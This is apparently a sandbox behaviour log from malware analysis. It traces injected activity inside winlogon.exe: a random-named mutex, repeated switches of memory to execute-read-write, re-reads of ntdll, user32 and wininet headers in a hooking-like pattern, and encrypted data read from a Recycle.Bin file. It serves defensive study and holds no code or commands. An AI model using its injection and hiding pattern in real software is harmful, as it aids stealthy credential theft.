636 C:\WINDOWS\system32\winlogon.exe BB10D98 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
636 C:\WINDOWS\system32\winlogon.exe 3D95EE89 2000 page execute and read and write page execute read success or wait 1 BAE95DC
636 C:\WINDOWS\system32\winlogon.exe 3D95EE89 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
636 C:\WINDOWS\system32\winlogon.exe BB104E8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
636 C:\WINDOWS\system32\winlogon.exe 3D94FABE 2000 page execute and read and write page execute read success or wait 1 BAE95DC
636 C:\WINDOWS\system32\winlogon.exe 3D94FABE 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
636 C:\WINDOWS\system32\winlogon.exe BAF65C8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
636 C:\WINDOWS\system32\winlogon.exe 3D9A608E 2000 page execute and read and write page execute read success or wait 1 BAE95DC
636 C:\WINDOWS\system32\winlogon.exe 3D9A608E 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
636 C:\WINDOWS\system32\winlogon.exe BAFF660 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
636 C:\WINDOWS\system32\winlogon.exe 3D94D508 2000 page execute and read and write page execute read success or wait 1 BAE95DC
System Activities:
+ System information queried
System info class Completion Count Source Address
BasicInformation success or wait 42 BAD6959
ProcessorInformation success or wait 41 BAD6959
CurrentTimeZoneInformation success or wait 1 BAE630C
+ Chronological sections
Operation Data Completion Time
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2019261058
Thread created PID: 636 TID: 2296 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\winlogon.exe Injected: false success or wait 2019262748
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2019263372
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2019264171
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: A80000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2019266779
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2019269108
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2019272245
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 14E0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2019316513
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 14E0000 Size: 299008 Protection: execute Mapped to pid: own pid object name not found 2019317732
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2019318230
Thread created PID: 636 TID: 2252 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\winlogon.exe Injected: false success or wait 2019325505
Thread delayed Time: 0 TID: 8786 success or wait 2019326138
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and write copy success or wait 2019326344
System info queried Type: BasicInformation success or wait 2019326448
System info queried Type: ProcessorInformation success or wait 2019326550
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019326691
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019326992
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2019327080
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019327217
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2019327303
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2019327408
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019327612
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2019327698
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019328095
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1420000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019328212
System info queried Type: BasicInformation success or wait 2019328501
System info queried Type: ProcessorInformation success or wait 2019328603
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019329093
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BAF6E20 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019329200
Thread created PID: 636 TID: 556 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\winlogon.exe Injected: false success or wait 2019329754
Thread created PID: 636 TID: 2008 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\winlogon.exe Injected: false success or wait 2019330823
Thread delayed Time: 0 TID: 8786 success or wait 2019331728
Thread delayed Time: 0 TID: 8786 success or wait 2019331873
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019331939
System info queried Type: BasicInformation success or wait 2019332049
System info queried Type: ProcessorInformation success or wait 2019332157
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019332305
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019332617
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2019332712
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019332855
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2019332948
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2019333059
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019333274
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2019333367
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019333554
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019333676
System info queried Type: BasicInformation success or wait 2019334627
System info queried Type: ProcessorInformation success or wait 2019334742
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019335178
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BB10A90 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019335284
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019335392
System info queried Type: BasicInformation success or wait 2019335495
System info queried Type: ProcessorInformation success or wait 2019335595
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019335716
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019336026
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2019336117
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019336255
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2019336345
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2019336452
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019336659
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2019336749
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019336929
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019337046
System info queried Type: BasicInformation success or wait 2019337654
System info queried Type: ProcessorInformation success or wait 2019337757
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019338189
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BAFF2F8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019338295
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019338403
System info queried Type: BasicInformation success or wait 2019338504
System info queried Type: ProcessorInformation success or wait 2019338604
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019338747
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019339045
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2019339137
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019339279
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2019339369
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2019339477
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019339687
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2019339777
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019339961
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019340079
System info queried Type: BasicInformation success or wait 2019340363
System info queried Type: ProcessorInformation success or wait 2019340466
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019340893
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BAFCF58 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019340999
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019341179
System info queried Type: BasicInformation success or wait 2019341281
System info queried Type: ProcessorInformation success or wait 2019341383
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019341524
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019341823
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2019341915
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019342055
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2019342145
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2019342253
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019342462
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2019342552
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019342737
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019342854
System info queried Type: BasicInformation success or wait 2019343139
System info queried Type: ProcessorInformation success or wait 2019343241
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019343670
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BB10168 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019343777
Section loaded Path: \KnownDlls\nspr4.dll Access: write and read and execute Type: unknown Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2019344357
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2019345153
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2019345515
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2019350926
System info queried Type: BasicInformation success or wait 2019351039
System info queried Type: ProcessorInformation success or wait 2019351147
File opened Path: C:\WINDOWS\system32\USER32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019351294
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2019351610
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 4 Value: D8 00 00 00 success or wait 2019351706
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2019352495
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 20 Value: 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2019352592
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 2019352704
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2019352918
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 2019353012
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2019353200
Section loaded Path: C:\WINDOWS\system32\user32.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 57344 Protection: readonly Mapped to pid: own pid success or wait 2019353322
System info queried Type: BasicInformation success or wait 2019354247
System info queried Type: ProcessorInformation success or wait 2019354359
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019355382
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BAFC210 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019355494
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2019355634
System info queried Type: BasicInformation success or wait 2019355736
System info queried Type: ProcessorInformation success or wait 2019355838
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019355987
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019356300
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2019356395
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019361972
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2019362882
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2019363008
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019363506
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2019363597
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019363786
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019363908
System info queried Type: BasicInformation success or wait 2019914848
System info queried Type: ProcessorInformation success or wait 2019914957
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019916404
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BB10D98 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019916509
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2019916653
System info queried Type: BasicInformation success or wait 2019916756
System info queried Type: ProcessorInformation success or wait 2019916859
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019917029
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019917374
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2019917465
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019917605
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2019917694
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2019917801
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019918012
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2019918101
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019918285
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019918402
System info queried Type: BasicInformation success or wait 2019919271
System info queried Type: ProcessorInformation success or wait 2019919376
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019919958
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BB104E8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019920063
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2019920199
System info queried Type: BasicInformation success or wait 2019920301
System info queried Type: ProcessorInformation success or wait 2019920402
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019920548
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019920853
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2019920943
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019921078
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2019921167
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2019921273
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019921482
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2019921570
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019921753
